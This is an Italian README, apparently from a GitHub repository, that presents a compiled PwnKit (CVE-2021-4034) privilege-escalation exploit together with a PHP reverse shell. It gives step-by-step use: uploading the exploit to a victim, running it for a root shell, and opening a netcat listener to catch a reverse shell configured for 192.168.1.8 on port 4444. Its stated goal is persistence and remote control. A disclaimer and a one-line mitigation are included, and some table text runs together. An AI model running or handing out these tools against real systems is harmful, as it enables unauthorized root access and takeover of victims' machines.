
Repository di ricerca sulla sicurezza contenente una Prova di Concetto (PoC) per la vulnerabilità CVE-2021-4034 (PwnKit) e utility di scripting per la dimostrazione di escalation dei privilegi ed esecuzione remota in ambienti Linux.
⚠️ DISCLAIMER: Questo repository è stato creato esclusivamente per scopi educativi e di ricerca sulla sicurezza. L'autore non è responsabile dell'uso improprio di questi strumenti. Usalo solo in ambienti controllati o dove hai il permesso esplicito.
Questo repository contiene un Proof of Concept (PoC) compilato per la vulnerabilità PwnKit (CVE-2021-4034), un difetto critico di escalation dei privilegi locale nel componente pkexec di Polkit.
Inoltre, è incluso uno script di Reverse Shell in PHP pronto per essere distribuito dopo lo sfruttamento o come vettore di accesso iniziale.
Ottenere accesso root su sistemi Linux vulnerabili e stabilire persistenza o controllo remoto tramite una shell inversa.
PwnKit (Binario ELF)L'exploit compilato per CVE-2021-4034.
pkexec per caricare una libreria condivisa dannosa ed eseguire codice come root.pkexec sia installato sul target.reverseShell.phpUn payload leggero per stabilire una connessione inversa.
192.168.1.84444/bin/bashphp reverseShell.php) o iniettato in un server web vulnerabile.PwnKit al sistema vittima.chmod +x PwnKit
./PwnKit
Se ha successo, dovresti ottenere una shell con privilegi di root immediatamente.nc -lvnp 4444
reverseShell.php se il tuo IP è diverso da quello configurato di default.php reverseShell.php
Questa vulnerabilità risiede in come pkexec gestisce gli argomenti della riga di comando. Passando una lista di argomenti vuota, pkexec tenta di accedere a argv[1] fuori dai limiti, consentendo a un attaccante di sovrascrivere le variabili d'ambiente in memoria, in particolare iniettando una variabile GCONV_PATH dannosa per dirottare il flusso di esecuzione.
Per proteggersi da questo exploit:
chmod 0755 /usr/bin/pkexec
Happy Hacking! 🏴☠️